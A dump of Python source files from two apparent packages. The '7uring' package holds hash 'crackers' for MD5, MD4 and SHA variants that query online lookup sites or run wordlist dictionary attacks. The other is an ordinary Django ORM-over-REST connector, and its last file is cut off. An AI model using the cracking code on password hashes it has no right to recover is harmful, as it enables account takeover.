import hashlib, requests, bs4, re, os, sys
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToMD5(string):
result = hashlib.md5(string.encode()) #Create an MD5 hash object
return result.hexdigest() #Return the required hexadecimal hash
def verifyMD5(md5):
md5Regex = re.compile(r'^[0-9a-f]{32}$') #Create a regex object
mo = md5Regex.search(md5.lower()) #Create a match object
if mo == None:
return False
else:
return True
def md5ToString(md5):
if not verifyMD5(md5):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
url = 'https://md5.gromweb.com/?md5=' + md5 #Create a url
res = requests.get(url) #Query the url
res.raise_for_status()
source = res.content
soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup object
css_path = 'html body div#page.p-1.p-3-lg div#container section#section article div#content p em.long-content.string'
elem = soup.select(css_path) #Find the required element
try:
print(colors['msg'] + 'Cracked!' + '\n' + colors['success'] + md5 + ':' + elem[0].text) #Print the cracked string
except:
print(colors['msg'] + 'Hash not found in databases')
def md5Brute(md5, wordlist):
md5 = md5.lower()
if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists and if it is a file
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path') #Exit program if invalid path
sys.exit()
if not verifyMD5(md5): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all lines in a list
for word in words:
md5String = stringToMD5(word.rstrip())
if md5String == md5: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + md5 + ":" + word)
break
else:
print(colors['msg'] + "Not found") | 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/turing/hashing/hashmd5.py | hashmd5.py |
import hashlib, requests, bs4, re, os, sys
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToSHA1(string):
result = hashlib.sha1(string.encode()) #Create a SHA1 hash object
return result.hexdigest() #Return the required hexadecimal hash
def verifySHA1(sha1):
sha1Regex = re.compile(r'^[a-f0-9]{40}$') #SHA-1 regex object
mo = sha1Regex.search(sha1.lower()) #Create a match object
if mo == None:
return False
else:
return True
def sha1ToString(sha1):
if not verifySHA1(sha1):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
url = 'https://sha1.gromweb.com/?hash=' + sha1 #Create url for scraping
res = requests.get(url) #Query the url
res.raise_for_status()
source = res.content
soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup object
css_path = 'html body div#page.p-1.p-3-lg div#container section#section article div#content p em.long-content.string'
elem = soup.select(css_path)
try:
print(colors['msg'] + 'Cracked!\n' + colors['success'] + sha1 + ':' + elem[0].text) #Print the cracked string
except:
print(colors['msg'] + 'Hash not found in databases')
def sha1Brute(sha1, wordlist):
sha1 = sha1.lower()
if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists and if it is a file
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path')
sys.exit()
if not verifySHA1(sha1): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all words in a list
for word in words:
sha1String = stringToSHA1(word.rstrip())
if sha1String == sha1: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + sha1 + ':' + word)
break
else:
print(colors['msg'] + 'Not found') | 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/turing/hashing/hashsha1.py | hashsha1.py |
import hashlib, requests, bs4, re, os, sys
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToSHA384(string):
result = hashlib.sha384(string.encode()) #Create a SHA384 object
return result.hexdigest() #Return the required hexadecimal hash
def verifySHA384(sha384):
sha384Regex = re.compile(r'^[0-9a-f]{96}$') #Create a regex object
mo = sha384Regex.search(sha384.lower()) #Create a match object
if mo == None:
return False
else:
return True
def sha384ToString(sha384):
sha384 = sha384.lower()
if not verifySHA384(sha384):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
URL = 'https://md5decrypt.net/en/Sha384/' #Create a url
myobj = {
'hash':sha384,
'captcha65684':'',
'ahah65684':'30beb54b674b10bf73888fda4d38893f',
'decrypt':'Decrypt'
}
res = requests.post(url=URL, data=myobj) #Send a POST request
res.raise_for_status()
source = res.content
soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup object
css_path = 'html body div#corps fieldset#answer b'
elem = soup.select(css_path) #Find the required element
try:
print(colors['msg'] + 'Cracked!\n' + colors['success'] + sha384 + ':' + elem[0].text) #Print the cracked string
except:
print(colors['msg'] + 'Hash not found in databases')
def sha384Brute(sha384, wordlist):
if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists and if it is a file
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path') #Exit program if invalid path
sys.exit()
if not verifySHA384(sha384): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all lines in a list
for word in words:
sha384String = stringToSHA384(word.rstrip())
if sha384String == sha384: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + sha384 + ':' + word)
break
else:
print(colors['msg'] + 'Not found') | 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/turing/hashing/hashsha384.py | hashsha384.py |
import os, hashlib, requests, bs4, re, sys
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToSHA256(string):
result = hashlib.sha256(string.encode()) #Create a SHA256 hash object
return result.hexdigest() #Return the required hexadecimal hash
def verifySHA256(sha256):
sha256Regex = re.compile(r'^[0-9a-f]{64}$') #Create a regex object
mo = sha256Regex.search(sha256.lower()) #Create a match object
if mo == None:
return False
else:
return True
def sha256ToString(sha256):
if not verifySHA256(sha256):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
URL = 'https://md5decrypt.net/en/Sha256/' #Create a url
myobj = {
'hash':sha256,
'captcha65684':'',
'ahah65684':'30beb54b674b10bf73888fda4d38893f',
'decrypt':'Decrypt'
}
res = requests.post(url=URL, data=myobj) #Send a POST request
res.raise_for_status()
source = res.content
soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup object
css_path = 'html body div#corps fieldset#answer b'
elem = soup.select(css_path) #Find the required element
try:
print(colors['msg'] + 'Cracked!\n' + colors['success'] + sha256 + ':' + elem[0].text) #Print the cracked string
except:
print(colors['msg'] + 'Hash not found in databases')
def sha256Brute(sha256, wordlist):
sha256 = sha256.lower()
if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path')
sys.exit()
if not verifySHA256(sha256): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all words in a list
for word in words:
sha256String = stringToSHA256(word.rstrip())
if sha256String == sha256: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + sha256 + ':' + word)
break
else:
print(colors['msg'] + 'Not found') | 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/turing/hashing/hashsha256.py | hashsha256.py |
import hashlib, re, sys, requests, bs4, os
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToMD4(string):
result = hashlib.new('md4',string.encode('utf-8')) #Create an MD4 hash object
return result.hexdigest() #Return the required hexadecimal hash
def verifyMD4(md4):
md4Regex = re.compile(r'^[0-9a-f]{32}$') #Create a regex object
mo = md4Regex.search(md4.lower()) #Create a match object
if mo == None:
return False
else:
return True
def md4ToString(md4):
if not verifyMD4(md4):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
URL = 'https://md5decrypt.net/en/Md4/' #Create a url
myobj = {
'hash':md4,
'captcha65':'',
'ahah65':'ea1f3b6fdf11511d0a4fa2ae757132db',
'decrypt':'Decrypt'
}
res = requests.post(url=URL, data=myobj) #Send a POST request
res.raise_for_status()
source = res.content
soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup object
css_path = 'html body div#corps fieldset#answer b'
elem = soup.select(css_path) #Find the required element
try:
print(colors['msg'] + 'Cracked!' + '\n' + colors['success'] + md4 + ':' + elem[0].text) #Print the cracked string
except:
print(colors['msg'] + 'Hash not found in databases')
def md4Brute(md4, wordlist):
md4 = md4.lower()
if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists and if it is a file
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path') #Exit program if invalid path
sys.exit()
if not verifyMD4(md4): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all lines in a list
for word in words:
md4String = stringToMD4(word.rstrip())
if md4String == md4: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + md4 + ":" + word)
break
else:
print(colors['msg'] + "Not found") | 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/turing/hashing/hashmd4.py | hashmd4.py |
import hashlib, requests, bs4, re, os, sys
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def stringToSHA512(string):
result = hashlib.sha512(string.encode()) #Create a SHA512 hash object
return result.hexdigest() #Return the required hexadecimal hash
def verifySHA512(sha512):
sha512Regex = re.compile(r'^[0-9a-f]{128}$') #Create a regex object
mo = sha512Regex.search(sha512) #Create a match object
if mo == None:
return False
else:
return True
def sha512ToString(sha512):
sha512 = sha512.lower()
if not verifySHA512(sha512):
print(colors['error'] + 'Invalid hash')
sys.exit()
else:
URL='https://md5decrypt.net/en/Sha512/' #Create a url
myobj = {
'hash':sha512,
'captcha13126':'',
'ahah13126':'8239e6d5b8e2f67f34cfbd3c77b05523',
'decrypt':'Decrypt'
}
res = requests.post(url=URL, data=myobj) #Send a POST request
res.raise_for_status()
source = res.content
soup = bs4.BeautifulSoup(source, 'lxml') #Create a beautiful soup bject
css_path = 'html body div#corps fieldset#answer b'
elem = soup.select(css_path) #Find the required element
try:
print(colors['msg'] + 'Cracked!\n' + colors['success'] + sha512 + ':' + elem[0].text) #Print the cracked string
except:
print(colors['msg'] + 'Hash not found in databases')
def sha512Brute(sha512, wordlist):
if os.path.exists(wordlist) and os.path.isfile(wordlist): #Check if the wordlist exists
if not os.path.isabs(wordlist): #Check if it is an absolute path
wordlist = os.path.abspath(wordlist)
else:
print(colors['error'] + 'Invalid path')
sys.exit()
if not verifySHA512(sha512): #Verify if hash is correct
print(colors['error'] + 'Invalid hash')
sys.exit()
with open(wordlist, 'r', errors='replace') as w:
words = w.readlines() #Store all words in a list
for word in words:
sha512String = stringToSHA512(word.rstrip())
if sha512String == sha512: #Check if hash matches
print(colors['msg'] + 'Cracked!')
print(colors['success'] + sha512 + ':' + word)
break
else:
print(colors['msg'] + 'Not found') | 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/turing/hashing/hashsha512.py | hashsha512.py |
__author__ = "Rimba Prayoga"
__copyright__ = "Copyright 2019, 88Spares"
__credits__ = ["88 Tech"]
__maintainer__ = "Rimba Prayoga"
__email__ = "[email protected]"
__status__ = "Development"
import json
from typing import List
from urllib.parse import urljoin
import requests
from django.conf import settings
from django.db import models
from django.db.models import Q, ObjectDoesNotExist
from django.utils.functional import cached_property
from .models import initialize_models, get_model, VirtualModel
initialize_models()
service_settings = getattr(settings, 'ORM_SERVICE', {
"url": "",
"auth_header": ""
})
ORM_SERVICE_URL = service_settings.get("url")
ORM_SERVICE_AUTH_HEADER = service_settings.get("auth_header")
class ORMServices(object):
"""
ORM Services Connector.
because you are familiar with Django ORM.
Use it like Django ORM :D
"""
def __init__(self, model: str, fields=None, **kwargs):
initialize_models()
app_label = None
if len(model.split('.')) == 2:
app_label, model = model.split('.')
if isinstance(model, str):
self._model_name = model
elif isinstance(model, type) and isinstance(model(), models.Model):
self._model_name = model._meta.model_name.lower()
else:
raise TypeError('unsupported type "%s" for model.' % type(model))
self._app_label = app_label
self._payload = {}
if fields is None:
fields = ['__all__']
self._fields = fields
self._exclude_fields = kwargs.get('exclude_fields', None)
self._result_cache = {}
self._CHUNK_SIZE = 20
self.model_info = get_model(model, app_label)
########################
# PYTHON MAGIC METHODS #
########################
def __repr__(self):
if self._payload:
_slice = self._payload.get('slice')
if _slice:
start = _slice.get('start')
stop = _slice.get('stop')
step = _slice.get('step')
data = list(self[start:stop:step])
else:
data = list(self[:self._CHUNK_SIZE])
if len(data) >= self._CHUNK_SIZE:
data[-1] = '...(remaining elements truncated)...'
return f"<Virtual Queryset {data}>"
return super(ORMServices, self).__repr__()
def __iter__(self):
data = self._result_cache.get('result')
if not self._payload:
data = []
if data is None:
self.__bind()
data = self._result_cache.get('result')
return iter(data)
def __len__(self):
count = self._result_cache.get("count", 0)
if not count and self.__last_query:
self.__bind()
count = self._result_cache.get("count", 0)
return count
def __bool__(self):
return bool(len(self))
def __getitem__(self, item):
result_cache = self._result_cache.get('result')
if result_cache:
return result_cache[item]
if isinstance(item, slice):
clone = self._clone()
clone._payload.update({
"slice": {
"start": item.start,
"stop": item.stop,
"step": item.step
}
})
return clone
_self = self.__bind()
if _self == self:
result_cache = self._result_cache.get('result')
return result_cache[item]
return _self
@cached_property
def __exclude_params(self):
return [
"all",
"exists",
"count",
"first",
"last",
"latest",
"values",
"save",
"distinct"
]
@cached_property
def __is_model_instance(self):
for method in ["first", "last", "latest"]:
if self._payload.get(method):
return True
return False
@property
def __payload_request(self):
payload = {
"model": self._model_name,
"payload": self._payload,
"fields": self._fields,
"exclude_fields": self._exclude_fields
}
if self._app_label:
payload.update({
"app_label": self._app_label
})
return payload
@property
def __last_query(self) -> str:
"""
:return: last query
"""
queries = list(self._payload.keys()).copy()
if 'slice' in queries:
queries.pop(queries.index('slice'))
try:
return queries[-1]
except IndexError:
return ''
@property
def __is_return_different_object(self) -> bool:
return self.__last_query in [
'first', 'last', 'get', 'latest',
'exists', 'count', 'create'
]
@property
def __is_return_instance(self) -> bool:
return self.__last_query in ['first', 'last', 'get', 'latest', 'create']
def __update_payload(self, name, data) -> None:
try:
existed = self._payload.get(name).copy() # type: Dict
except AttributeError:
pass
else:
existed = existed.copy()
existed.update({
"args": [*existed.get("args", []), *data.get("args", [])],
"kwargs": {
**existed.get("kwargs"),
**data.get("kwargs")
}
})
data = existed
self._payload.update({
name: data
})
# --- expressions
def __resolve_q(self, args: Q) -> List:
"""
Resolve expression Q. e.g: Q(a=b) | Q(c=d).
:param params:
:param result:
:param extra_params:
:return:
"""
_, params, connector = args.deconstruct()
params = list(params)
for index, param in enumerate(params.copy()):
if isinstance(param, Q):
params[index] = self.__resolve_q(param)
elif isinstance(param, tuple):
params[index] = list(param)
return ['Q', params, connector]
def __resolve_expression(self, expr):
expression_handlers = {
"Q": self.__resolve_q
}
return expression_handlers.get(expr)
def __do_query(self, name, *args, **kwargs):
assert self._payload.get('slice') is None, \
"Cannot filter a query once a slice has been taken."
_args = list(args).copy()
for index, arg in enumerate(_args):
if isinstance(arg, Q):
_args[index] = self.__resolve_q(arg)
clone = self._clone()
payload = {
"args": _args,
"kwargs": kwargs
}
clone.__update_payload(name, data=payload)
if clone.__is_return_different_object:
if clone.__is_return_instance:
return clone.__bind()
return clone.fetch()
return clone
def _clone(self):
"""
:return: clone of current class
"""
exclude_fields = self._exclude_fields
if isinstance(exclude_fields, (dict, list)):
exclude_fields = self._exclude_fields.copy()
model_name = self._model_name
if self._app_label:
model_name = f'{self._app_label}.{model_name}'
clone = self.__class__(
model_name,
self._fields.copy(),
exclude_fields=exclude_fields
)
clone._payload = self._payload.copy()
return clone
def __clear_query(self, name=None):
if name is not None:
try:
del self._payload[name]
except KeyError:
pass
else:
self._payload = {}
def __bind(self, model=None, data=None, with_relation=False):
if data is None:
data = self.fetch()
if isinstance(data, dict):
_model = model
if _model is None:
_model = self._model_name
vi = VirtualModel(
model=_model,
payload=self.__payload_request,
value=data,
model_info=self.model_info
)
return vi
vi = {
"result": [],
"count": 0
}
if isinstance(data, list):
if {'values', 'values_list'} & set(self._payload.keys()):
vi.update({
"result": data,
"count": len(data)
})
else:
for i in data:
_vi = VirtualModel(
model=self._model_name,
payload=self.__payload_request,
value=i,
model_info=self.model_info
)
vi.get('result').append(_vi)
vi.update({
"count": vi.get("count") + 1
})
self._result_cache = vi
return self
def __bind_with_relation(self, relation_data):
data = self.fetch_with_relation(relation_data)
return self.__bind(data=data, with_relation=True)
# for custom method
def call_manager_method(self, name, *args, **kwargs):
return self.__do_query(name, *args, **kwargs)
# --- fetch data from orm services
def __request_get(self, url, payload, params=None):
response = requests.get(url, data=json.dumps(payload), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
}, params=params)
if response.status_code == 400:
raise Exception(response.text)
elif response.status_code == 404:
raise ObjectDoesNotExist(
"%s matching query does not exist." % self._model_name.capitalize())
try:
return response.json()
except json.decoder.JSONDecodeError:
if response.text:
raise Exception(response.text)
def __request_post(self, url, payload):
response = requests.post(url, data=json.dumps(payload), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
try:
return response.json()
except json.decoder.JSONDecodeError:
raise Exception(response.text)
def fetch(self):
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
return self.__request_get(
url=url,
payload=self.__payload_request
)
def fetch_with_relation(self, relation_data):
"""
fetch data with relation object
:param relation_data: -- e.g:
ORMServices(model='partitem').all()
.fetch_with_relation({'member':[{'user': ['id', 'email']}]})
:return: -- response:
[{'member': {'user': {'id': 556, 'email': '[email protected]'}}},]
"""
payload = self.__payload_request.copy()
payload.update({
"relation_data": relation_data
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
return self.__request_get(
url=url,
payload=payload
)
def get_property(self, property_name):
payload = self.__payload_request.copy()
payload.update({
"property_name": property_name
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_property")
return self.__request_get(url=url, payload=payload)
def call_property(self, property_name):
payload = self.__payload_request.copy()
payload.update({
"property_name": property_name
})
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/call_property")
return self.__request_get(url=url, payload=payload)
# --- querying
def get_queryset(self, *args, **kwargs):
return self.__do_query('all', *args, **kwargs)
def all(self):
return self.get_queryset()
def exists(self) -> bool:
return self.__do_query('exists')
def get(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('get', *args, **kwargs)
def filter(self, *args, **kwargs):
return self.__do_query('filter', *args, **kwargs)
def exclude(self, *args, **kwargs):
return self.__do_query('exclude', *args, **kwargs)
def values(self, *args, **kwargs):
return self.__do_query('values', *args, **kwargs)
def values_list(self, *args, **kwargs):
return self.__do_query('values_list', *args, **kwargs)
def count(self, *args, **kwargs) -> int:
return self.__do_query('count', *args, **kwargs)
def first(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('first', *args, **kwargs)
def last(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('last', *args, **kwargs)
def latest(self, *args, **kwargs) -> VirtualModel:
return self.__do_query('latest', *args, **kwargs)
def order_by(self, *args, **kwargs):
return self.__do_query('order_by', *args, **kwargs)
def select_related(self, *args, **kwargs):
return self.__do_query('select_related', *args, **kwargs)
def prefetch_related(self, *args, **kwargs):
return self.__do_query('prefetch_related', *args, **kwargs)
def distinct(self, *args, **kwargs):
return self.__do_query('distinct', *args, **kwargs)
def only(self, *args, **kwargs):
return self.__do_query('only', *args, **kwargs)
def defer(self, *args, **kwargs):
return self.__do_query('defer', *args, **kwargs)
def create(self, *args, **kwargs):
return self.__do_query('create', *args, **kwargs)
def update(self, **kwargs):
self.__update_payload('update', data={
'args': [],
'kwargs': kwargs
})
return self.fetch()
def delete(self):
self.__update_payload('delete', data={
'args': [],
'kwargs': {}
})
return self.fetch()
def get_or_create(self, *args, **kwargs):
try:
return self.get(*args, **kwargs), False
except ObjectDoesNotExist:
return self.create(**kwargs), True
def custom(self, name, **kwargs):
return self.__do_query(name, *(), **kwargs)
@classmethod
def execute_many(cls, payloads: List):
payload_requests = list(
map(lambda orm: orm._ORMServices__payload_request, payloads))
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/execute_many")
response = requests.get(url, data=json.dumps(payload_requests), headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
try:
response = response.json()
except Exception:
raise Exception(response.content)
else:
result = []
for index, orm_service in enumerate(payloads):
result.append(orm_service._ORMServices__bind(data=response[index]))
return result
def _save(self, payload, *args, **kwargs):
self.__do_query('save', *args, **kwargs)
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/save")
return self.__request_post(
url=url,
payload=payload
) | 88orm-service-connector | /88orm-service-connector-0.3.3.tar.gz/88orm-service-connector-0.3.3/orm_service_connector88/connector.py | connector.py |
from collections import OrderedDict
from typing import Dict
from rest_framework import serializers
from .connector import ORMServices
class ModelSerializer(serializers.Serializer):
map_fields = {
'AutoField': serializers.IntegerField,
'CharField': serializers.CharField,
'IntegerField': serializers.IntegerField,
'ListField': serializers.ListField,
'OneToOneField': serializers.IntegerField,
'ForeignKey': serializers.IntegerField
}
def get_fields(self) -> Dict:
assert hasattr(self, 'Meta'), (
'Class {serializer_class} missing "Meta" attribute'.format(
serializer_class=self.__class__.__name__
)
)
assert hasattr(self.Meta, 'model'), (
'Class {serializer_class} missing "Meta.model" attribute'.format(
serializer_class=self.__class__.__name__
)
)
assert hasattr(self.Meta, 'fields'), (
'Class {serializer_class} missing "Meta.fields" attribute'.format(
serializer_class=self.__class__.__name__
)
)
assert len(self.Meta.fields) > 0, (
'Are you stupid, you\'re put a blank list on "Meta.fields"'
)
ret = super(ModelSerializer, self).get_fields()
uncreated_fields = set(self.Meta.fields) - set(ret.keys())
model_info = self.Meta.model.model_info
model_fields = model_info.get('fields')
model_related = model_info.get('related_names')
if uncreated_fields:
for uncreated_field in uncreated_fields:
if uncreated_field in model_fields:
field = model_fields.get(uncreated_field).get('type')
elif uncreated_field in model_related:
field = 'ListField'
if model_related.get(uncreated_field).get('type') == 'OneToOneRel':
field = 'IntegerField'
else:
field = 'CharField'
field_class = self.map_fields.get(field, serializers.CharField)
ret.update({
uncreated_field: field_class()
})
for key, value in ret.items():
value.bind(key, self)
return ret
def to_representation(self, instance):
ret = OrderedDict()
model_info = self.Meta.model.model_info
model_fields = model_info.get('fields')
for field, field_class in self.get_fields().items():
attr = field_class.source or field
try:
if model_fields.get(attr).get('type') in ['ForeignKey', 'OneToOneField']:
attr = f"{attr}_id"
except AttributeError:
pass
value = getattr(instance, attr, None)
if isinstance(value, ORMServices):
if attr in model_info.get('related_names'):
value = instance.reverse_related(attr)
if field_class.__class__.__name__ == 'SerializerMethodField':
value = instance
if value is not None:
value = field_class.to_representation(value)
ret[field] = value
return ret | 88orm-service-connector | /88orm-service-connector-0.3.3.tar.gz/88orm-service-connector-0.3.3/orm_service_connector88/serializers.py | serializers.py |
import json
from typing import Dict
from urllib.parse import urljoin
import requests
from django.conf import settings
# NOTE: All models info will be stored here.
# contains fields and related_names,
# keep note don't redefine the MODELS variable
# for keeping the reactivity. If you want to
# change the value, just clear or append it.
MODELS = []
service_settings = getattr(settings, 'ORM_SERVICE', {
"url": "",
"auth_header": ""
})
ORM_SERVICE_URL = service_settings.get("url")
ORM_SERVICE_AUTH_HEADER = service_settings.get("auth_header")
class VirtualModel(object):
def __init__(
self,
model: str,
payload: dict,
value=None,
model_info=None
):
self._payload = payload
app_label = None
if len(model.split('.')) == 2:
app_label, model = model.split('.')
self.__model = model
self._app_label = app_label
self._attrs = {}
if not model_info:
model_info = get_model(model, app_label)
if not app_label:
self._app_label = model_info.get('app_label')
self._fields = model_info.get('fields') # type: Dict
self._related_names = model_info.get('related_names') # type: Dict
if value:
self._set_value(value)
def __repr__(self):
key = self._attrs.get('id') or self._attrs.get(next(iter(self._attrs)))
model_name = self.__model
if model_name.islower():
model_name = model_name.capitalize()
return f"<{model_name}: {key}>"
def __setattr__(self, key, value):
try:
super(VirtualModel, self).__setattr__(key, value)
if key in self._fields:
self._attrs.update({
key: value
})
except Exception:
pass
def _set_attr_single_instance(self, key, value):
from .connector import ORMServices
attr_value = None
if self._attrs.get(f"{key}_id"):
related_model = value.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
attr_value = ORMServices(model)
setattr(self, key, attr_value)
def _set_related_attributes(self):
from .connector import ORMServices
for key, value in self._fields.items():
if not hasattr(self, key):
type_field = value.get('type')
if type_field in ['ForeignKey', 'OneToOneField']:
self._set_attr_single_instance(key, value)
elif type_field == 'ManyToManyField':
related_model = value.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
attr_value = ORMServices(model)
setattr(self, key, attr_value)
for key, value in self._related_names.items():
if not hasattr(self, key):
related_model = value.get('related_model')
model = f"{related_model.get('app_label')}.{related_model.get('name')}"
attr_value = ORMServices(model)
setattr(self, key, attr_value)
def _set_value(self, attrs: Dict):
self._attrs.update(attrs)
for key, value in attrs.items():
setattr(self, key, value)
self._set_related_attributes()
def get_related(self, name):
from .connector import ORMServices
attr = getattr(self, name)
if isinstance(attr, ORMServices):
if name in self._fields:
field = self._fields.get(name)
if field.get('type') in ['ForeignKey', 'OneToOneField']:
return attr.get(id=self._attrs.get(f"{name}_id"))
elif field.get('type') == 'ManyToManyField':
key = field.get('related_model').get('related_query_name')
return attr.filter(**{key: self.id})
return attr
def reverse_related(self, related_name):
try:
orm = getattr(self, related_name) # type: ORMServices
rel = self._related_names.get(related_name)
related_model = rel.get('related_model')
filter_kwargs = {
related_model.get('related_field'): self.id
}
if rel.get('type') == 'OneToOneRel':
return orm.get(**filter_kwargs)
return orm.filter(**filter_kwargs)
except AttributeError:
raise AttributeError(f'{self.__model} has no related {related_name}')
def refresh_from_db(self):
from .connector import ORMServices
instance = ORMServices(
model=self.__model,
fields=list(self._attrs)
)
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_queryset")
attrs = instance._ORMServices__request_get(
url=url,
payload=self._payload
)
if isinstance(attrs, dict):
for key, value in attrs:
setattr(self, key, value)
def save(self):
from .connector import ORMServices
instance = ORMServices(
model=self.__model,
fields=list(self._attrs)
)
payload = self._payload.copy()
payload.get("payload").update({
"save": self._attrs
})
return instance._save(payload)
class ModelNotFound(Exception):
pass
class MultipleModelsReturned(Exception):
pass
def initialize_models(force=False):
global MODELS
if not MODELS or force:
url = urljoin(ORM_SERVICE_URL, "/api/v1/orm_services/get_models")
response = requests.get(url, headers={
"content-type": "application/json",
'Authorization': ORM_SERVICE_AUTH_HEADER
})
if response.status_code == 400:
raise Exception(response.text)
try:
response = response.json()
except json.decoder.JSONDecodeError:
if response.text:
raise Exception(response.text)
else:
MODELS.clear()
MODELS += response
def get_model(name: str, app_label=None) -> Dict:
initialize_models()
name = name.lower()
result = list(filter(
lambda model: model.get('model') == name,
MODELS
))
if app_label:
result = list(filter(
lambda model: model.get('app_label') == app_label,
result
))
if not result:
msg = f"Cannot find model {name}"
if app_label:
msg = f"{msg} with app_label {app_label}"
raise ModelNotFound(msg)
if len(result) > 1:
multiple = list(map(lambda x: x.get('app_label'), result))
raise MultipleModelsReturned(f"Please provide app_label: {multiple}")
return result[0] | 88orm-service-connector | /88orm-service-connector-0.3.3.tar.gz/88orm-service-connector-0.3.3/orm_service_connector88/models.py | models.py |
__author__ = "Rimba Prayoga"
__copyright__ = "Copyright 2019, 88Spares"
__credits__ = ["88 Tech"]
__maintainer__ = "Rimba Prayoga"
__email__ = "[email protected]"
__status__ = "Development"
import base64
import json
from datetime import date, datetime
from typing import List
from urllib.parse import urljoin
import requests
from django.conf import settings
from django.core.files.base import ContentFile
from django.db import models
from django.db.models import Q, ObjectDoesNotExist
from django.utils.functional import cached_property
from .models import initialize_models, get_model, VirtualModel
initialize_models()
service_settings = getattr(settings, 'ORM_SERVICE', {
"url": "",
"auth_header": "",
"communication": {
"method": "rest"
}
})
ORM_SERVICE_URL = service_settings.get("url")
ORM_SERVICE_AUTH_HEADER = service_settings.get("auth_header")
ORM_SERVICE_COMMUNICATION = service_settings.get("communication", {})
if ORM_SERVICE_COMMUNICATION.get("method") == "rpc":
try:
from nameko.standalone.rpc import ClusterRpcProxy
except ImportError:
raise Exception('Nameko is required for using rpc.')
class ORM88(object):
"""
ORM Services Connector.
because you are familiar with Django ORM.
Use it like Django ORM :D
"""
def __init__(self, model: str, fields=None, **kwargs):
initialize_models()
app_label = None
if len(model.split('.')) == 2:
app_label, model = model.split('.')
if isinstance(model, str):
self._model_name = model
elif isinstance(model, type) and isinstance(model(), models.Model):
self._model_name = model._meta.model_name.lower()
else:
raise TypeError('unsupported type "%s" for model.' % type(model))
self._app_label = app_label
self._payload = {}
if fields is None:
fields = ['__all__']
self._fields = fields
self._exclude_fields = kwargs.get('exclude_fields', None)
self._result_cache = {}
self._CHUNK_SIZE = 20
self._prefetch_done = False
self.model_info = get_model(model, app_label)
########################
# PYTHON MAGIC METHODS #
########################
def __repr__(self):
if self._payload:
_slice = self._payload.get('slice')
if _slice:
start = _slice.get('start')
stop = _slice.get('stop')
